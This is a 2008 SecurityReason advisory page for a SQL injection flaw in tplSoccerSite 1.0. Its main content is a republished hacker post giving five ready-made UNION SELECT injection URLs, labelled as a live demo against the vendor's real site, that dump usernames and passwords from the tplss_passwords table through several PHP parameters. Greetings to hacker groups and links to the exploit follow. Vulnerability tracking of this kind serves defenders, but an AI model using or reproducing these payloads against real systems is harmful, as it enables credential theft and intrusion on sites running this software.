|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4018 CVE : CVE-2008-3251 CWE : CWE-89 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : No Credit : Mr.SQL Published : 23.07.2008
Advisory Content : ############################################################### #################### Viva IslaM Viva IslaM #################### ## ## Remote SQL injection Vulnerability ## ## tplSoccerSite 1.0 ( player.php id ) ## ############################################################### ############################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f ## ## Email : SQL@Hotmail.it ## ## SYRiAN Arab HACkErS ######################## ######################## ## ## -[[: L!VE DEMO :]]- ## ## 1) www.tpl-design.com/tplsoccersite/tampereunited/index.php?id=-1'+UNION+SELEC T+0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword)MrSQL,current_user,0,0+FRO M+tplss_passwords/* ## 2) www.tpl-design.com/tplsoccersite/tampereunited/player.php?id=-1'+UNION+SELE CT+0,0,CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0,0,0,0,0,0+ FROM+tplss_passwords/* ## 3) www.tpl-design.com/tplsoccersite/tampereunited/opponent.php?opp=-1'+UNION+S ELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0,0+FROM+tplss_ passwords/* ## 4) www.tpl-design.com/tplsoccersite/tampereunited/matchdetails.php?id=-1'+UNIO N+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CO NCAT_WS(0x3a,PasswordUser,PasswordPassword),0,0,0,0,0+FROM+tplss_passwords/ * ## 5) www.tpl-design.com/tplsoccersite/tampereunited/additionalpage.php?id=-1'+UN ION+SELECT+CONCAT_WS(0x3a,PasswordUser,PasswordPassword),'MrSQL',0+FROM+tpl ss_passwords/* ## ######################## ######################## -[[ NOTE ]]- 1 ) Download [[ tplSoccerSite 1.0 ]] http://www.tpl-design.com/download/tpl_ss_10_free.zip ########################################################################### ############################ ########################################################################### ############################ -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS :: ########################################################################### ############################ ########################################################################### ############################ References : http://securityreason.com/expldownload/1/4345/1 (Exploit) http://www.securityfocus.com/bid/30260
http://www.frsirt.com/english/advisories/2008/2121/references
http://tpl-design.com/index.php
http://xforce.iss.net/xforce/xfdb/43849
http://www.milw0rm.com/exploits/6088
http://secunia.com/advisories/31111  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |